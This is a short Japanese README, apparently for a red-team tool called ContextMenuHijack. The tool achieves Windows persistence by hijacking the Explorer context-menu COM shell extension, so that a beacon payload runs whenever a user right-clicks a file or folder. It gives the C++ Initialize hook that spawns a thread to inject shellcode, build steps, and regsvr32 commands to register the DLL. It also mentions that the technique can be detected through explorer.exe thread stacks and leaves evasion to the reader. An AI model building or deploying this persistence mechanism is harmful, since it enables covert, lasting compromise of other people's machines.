
エクスプローラーのコンテキストメニューでファイル/フォルダーを右クリックするたびにペイロードを実行し、永続化を実現する
この着想のきっかけは、@NinjaParanoid です:
ContextMenuHijack は、人間の行動に基づく COM ハイジャッキングを利用したシンプルな永続化テクニックです。ファイルエクスプローラーでファイル/フォルダーを右クリックしてコンテキストメニューを開くと、指定したビーコンが同時に実行されます。
IFACEMETHODIMP FileContextMenuExt::Initialize( LPCITEMIDLIST pidlFolder, LPDATAOBJECT pDataObj, HKEY hKeyProgID ) {
DWORD tid = NULL;
CreateThread(NULL, 1024 * 1024, (LPTHREAD_START_ROUTINE)InjectShc, NULL, 0, &tid);
if (NULL == pDataObj) {
if (pidlFolder != NULL) {
}
return S_OK;
}
return S_OK;
}
ソリューションファイル(.sln)を読み込んでビルドするだけです。この永続化テクニックを使用するには 管理者権限 が必要であることに注意してください。これらがすべて完了したら、regsvr32 を使用して DLL ファイルをレジストリに登録するだけです:
regsvr32 "C:\path\to\ContextMenuHijack.dll"
アンインストールしたい場合は、
/uフラグを使用してください
regsvr32 /u "C:\path\to\ContextMenuHijack.dll"

explorer.exe のスレッドスタックから簡単に検出される可能性があります。独自の回避テクニックを使用するかどうかは、あなた次第です